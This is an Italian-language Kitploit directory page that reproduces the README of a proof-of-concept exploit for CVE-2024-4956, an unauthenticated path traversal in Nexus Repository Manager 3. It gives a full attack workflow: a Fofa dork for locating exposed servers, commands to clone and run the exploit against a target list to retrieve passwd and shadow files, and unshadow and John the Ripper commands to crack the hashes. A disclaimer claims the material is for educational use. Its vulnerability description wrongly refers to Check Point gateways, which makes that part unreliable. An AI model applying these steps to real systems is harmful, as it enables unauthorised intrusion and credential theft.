Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-4956 — POC - CVE-2024–4956 - Nexus Repository Manager 3 Path Traversal non autenticato | Kitploit
Strumenti/GitHubGitHub/verylazytech/cve-2024-4956
Password CrackingRicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta Informazioni
GitHubverylazytech/cve-2024-4956

CVE-2024-4956

POC - CVE-2024–4956 - Nexus Repository Manager 3 Path Traversal non autenticato

Vedi Repository
1641 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2024-4956

My Shop Medium Github Buy Me A Coffee

POC - CVE-2024–4956 - Path Traversal non autenticato in Nexus Repository Manager 3

Potenzialmente consente a un attaccante di leggere determinate informazioni sui Check Point Security Gateways una volta connessi a Internet e con le funzionalità Remote Access VPN o Mobile Access Software Blades abilitate. È disponibile una patch di sicurezza che mitiga questa vulnerabilità.

Leggi di più — CVE-2024-4956

Disclaimer: Questa Proof of Concept (POC) è creata esclusivamente a scopo educativo e di test etico. L'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per usi impropri o danni causati da questo programma.

Per Iniziare

Trovare Target

Per trovare potenziali target, utilizza Fofa (simile a Shodan.io):

  • Dork Fofa: header="Server: Nexus/3.53.0-01 (OSS)"

Alt text

Per prima cosa, clona il repository:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-4956

Successivamente scegli il tuo target e aggiungilo al file list.txt in questo formato:

  • https://indirizzo_ip

Esegui l'Exploit:

root@kitploit:~
python3 CVE-2024-4956.py -l list.txt

L'output sono i file passwd e shadow trovati:

Alt text

Ora, dopo aver trovato entrambi i file passwd e shadow, puoi provare a crackare gli hash con JohnTheRipper. Dopo aver eseguito l'exploit hai 2 file, passwd e shadow, quindi puoi unirli in un unico file e provare a crackarli (ho usato rockyou.txt ma può essere qualsiasi wordlist di password):

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Scarica lo strumento